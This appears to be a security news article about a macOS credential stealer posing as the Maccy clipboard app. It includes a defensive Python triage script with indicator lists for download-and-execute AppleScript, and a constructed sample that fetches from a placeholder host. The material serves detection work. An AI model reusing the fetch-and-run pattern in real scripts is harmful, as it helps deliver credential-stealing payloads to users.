New macOS Malware Uses Stealthy Techniques to Steal Credentials

Researchers Discover Novel macOS Malware with Custom Credential Stealing Code

Researchers have identified a previously unseen piece of macOS malware that employs sophisticated tradecraft to infect Macs with custom-developed credential-stealing code. The malware operates in two stages.

Delivery and Execution Chain

The malware is distributed in a disk image posing as Maccy, a clipboard manager for Macs. It’s written in AppleScript and uses native Objective-C APIs to download and execute the second stage payload.
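The first stage described above is notable for pairing AppleScript with Foundation networking classes to fetch and run a second stage. The following triage script is an added example, not code from the original article or from the Maccy project: it scans AppleScript source text for that download-plus-execute pairing. The indicator token lists, the placeholder `.invalid` host and both sample scripts are constructed for this example and are not indicators from the article.

```python
"""Heuristic triage of AppleScript source for download-and-execute patterns.

Added example (not from the article): flags scripts that combine Foundation
networking classes with an execution primitive. Either family on its own is
common in benign scripts; the pairing is what warrants a closer look.
"""
import re
from dataclasses import dataclass
from typing import List

# Assumed indicator families chosen for this example, not taken from the article.
NETWORK_TOKENS = (
    "NSURL", "NSData", "dataWithContentsOfURL",
    "NSURLSession", "NSURLRequest", "NSMutableURLRequest",
)
EXEC_TOKENS = ("do shell script", "NSTask", "launchPath", "executableURL", "NSWorkspace")

# `use framework "Foundation"` is how AppleScriptObjC pulls in native classes.
FRAMEWORK_RE = re.compile(r'^\s*use\s+framework\s+"([A-Za-z0-9_]+)"', re.MULTILINE)
STRING_RE = re.compile(r'"([^"\n]*)"')


@dataclass
class Triage:
    frameworks: List[str]
    network_hits: List[str]
    exec_hits: List[str]
    urls: List[str]

    @property
    def suspicious(self) -> bool:
        # A pure update check (network only) or a pbpaste wrapper (exec only)
        # is normal; a script that both fetches and runs something is not.
        return bool(self.network_hits) and bool(self.exec_hits)


def triage_applescript(source: str) -> Triage:
    """Return which indicator families appear in one AppleScript source text."""
    frameworks = FRAMEWORK_RE.findall(source)
    network_hits = [t for t in NETWORK_TOKENS if t in source]
    exec_hits = [t for t in EXEC_TOKENS if t in source]
    # Surface literal URLs so an analyst can pivot on the host without running anything.
    urls = [s for s in STRING_RE.findall(source)
            if s.lower().startswith(("http://", "https://"))]
    return Triage(frameworks, network_hits, exec_hits, urls)


def triage_file(path: str) -> Triage:
    """Triage a plain-text .applescript file (decompile .scpt first, see note)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return triage_applescript(fh.read())


# Constructed sample: a harmless clipboard helper (execution primitive, no network).
BENIGN = """-- constructed benign sample
set clip to do shell script "pbpaste"
display dialog clip
"""

# Constructed sample with a placeholder host; it only carries the indicator
# pairing and does not implement a working stager.
SUSPECT = """-- constructed suspicious sample, placeholder host
use framework "Foundation"
set remote to current application's NSURL's URLWithString:"https://STAGE2-HOST-PLACEHOLDER.invalid/x"
set blob to current application's NSData's dataWithContentsOfURL:remote
do shell script "echo staged"
"""

if __name__ == "__main__":
    for label, src in (("benign", BENIGN), ("suspect", SUSPECT)):
        r = triage_applescript(src)
        print(f"{label}: suspicious={r.suspicious} frameworks={r.frameworks} "
              f"network={r.network_hits} exec={r.exec_hits} urls={r.urls}")
```

Compiled `.scpt` files are a binary format, so run `osadecompile file.scpt` on a macOS host to recover the source text before feeding it to `triage_file`; the heuristic is deliberately coarse and is meant to prioritise samples for manual review, not to replace it.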

Stealth Measures and Password Validation

The malware employs unusual techniques for stealth. When double-clicked, the AppleScript opens in the macOS Script Editor, where malicious functionality is hidden. The malware also validates the target’s login password before sending it to an attacker-controlled server.

Conclusion

PamStealer combines a recently emerging delivery surface with a less familiar payload, showcasing the evolution of commodity macOS stealers towards quieter execution chains and native implementations.
